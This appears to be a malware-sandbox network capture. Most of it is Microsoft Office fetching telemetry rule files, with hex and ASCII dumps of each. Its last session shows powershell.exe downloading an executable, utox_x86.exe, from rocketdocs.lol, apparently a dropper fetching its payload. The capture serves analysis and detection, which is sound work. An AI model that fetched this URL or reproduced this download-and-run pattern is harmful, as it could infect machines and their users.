                                                                                                      2024-10-08 18:51:23 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:24 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:23 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 419
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                      ETag: "0x8DC582B9748630E"
                                                                                                      x-ms-request-id: 09392ef7-101e-0046-3f05-1791b0000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185123Z-1657d5bbd48cpbzgkvtewk0wu000000005e000000000mxfc
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:24 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      23192.168.2.74972913.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:23 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:24 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:23 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 404
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                      ETag: "0x8DC582B9E8EE0F3"
                                                                                                      x-ms-request-id: b6b3ae71-d01e-0028-6ce6-187896000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185123Z-1657d5bbd4824mj9d6vp65b6n400000005k000000000kv0k
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:24 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      24192.168.2.74972813.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:23 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:24 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:24 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 472
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                      ETag: "0x8DC582B9DACDF62"
                                                                                                      x-ms-request-id: 20b36261-201e-006e-7102-17bbe3000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185123Z-1657d5bbd48tnj6wmberkg2xy800000005dg00000000qs1u
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:24 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      25192.168.2.74973013.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:23 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:24 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:23 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 468
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                      ETag: "0x8DC582B9C8E04C8"
                                                                                                      x-ms-request-id: 81e42967-c01e-0014-5ee9-16a6a3000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185123Z-1657d5bbd48wd55zet5pcra0cg0000000570000000014bc5
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:24 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      26192.168.2.74973113.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:24 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:24 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:24 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 428
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                      ETag: "0x8DC582BAC4F34CA"
                                                                                                      x-ms-request-id: 6be05283-001e-00a2-2700-17d4d5000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185124Z-1657d5bbd48brl8we3nu8cxwgn00000005ng00000000strs
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:24 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      27192.168.2.74973213.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:24 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:24 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:24 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 499
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                      ETag: "0x8DC582B98CEC9F6"
                                                                                                      x-ms-request-id: 40323690-a01e-0002-0100-175074000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185124Z-1657d5bbd48tqvfc1ysmtbdrg0000000053g000000013vhg
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:24 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      28192.168.2.74973313.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:24 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:24 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:24 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 415
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                      ETag: "0x8DC582B988EBD12"
                                                                                                      x-ms-request-id: c530354f-501e-0016-5013-17181b000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185124Z-1657d5bbd48sqtlf1huhzuwq70000000052000000000r1rs
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:24 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      29192.168.2.74973413.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:24 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:24 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:24 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 471
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                      ETag: "0x8DC582BB5815C4C"
                                                                                                      x-ms-request-id: 7cec3a6f-e01e-0033-3414-174695000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185124Z-1657d5bbd48vlsxxpe15ac3q7n00000005bg00000000gx5m
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:24 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      30192.168.2.74973513.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:24 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:24 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:24 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 419
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                      ETag: "0x8DC582BB32BB5CB"
                                                                                                      x-ms-request-id: d415a278-e01e-0051-6efe-1684b2000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185124Z-1657d5bbd482tlqpvyz9e93p5400000005eg00000000hwtx
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:24 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      31192.168.2.74973613.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:24 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:24 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:24 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 494
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                      ETag: "0x8DC582BB8972972"
                                                                                                      x-ms-request-id: 688d2aae-a01e-0084-3466-179ccd000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185124Z-1657d5bbd48sqtlf1huhzuwq70000000053000000000n45p
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:24 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      32192.168.2.749737188.114.97.34435884C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:24 UTC76OUTGET /utox_x86.exe HTTP/1.1
                                                                                                      Host: rocketdocs.lol
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-10-08 18:51:25 UTC677INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:25 GMT
                                                                                                      Content-Type: application/x-msdownload
                                                                                                      Content-Length: 4971787
                                                                                                      Connection: close
                                                                                                      last-modified: Sun, 29 Sep 2024 18:17:10 GMT
                                                                                                      x-turbo-charged-by: LiteSpeed
                                                                                                      Cache-Control: max-age=14400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 13
                                                                                                      Accept-Ranges: bytes
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lnPHZwNNEI8VD9S5TvB9C1fraNwlJrIDQyk7MA0Yrw4N3bjJUGeX3MklMgwra8uXbAV5MAC4AHn1L2oOh%2FZfGxxne12fMHk1e1QzdMxyxq8YONe0u%2BipAkAv%2BOYIk0bYnA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8cf85279398b3314-EWR
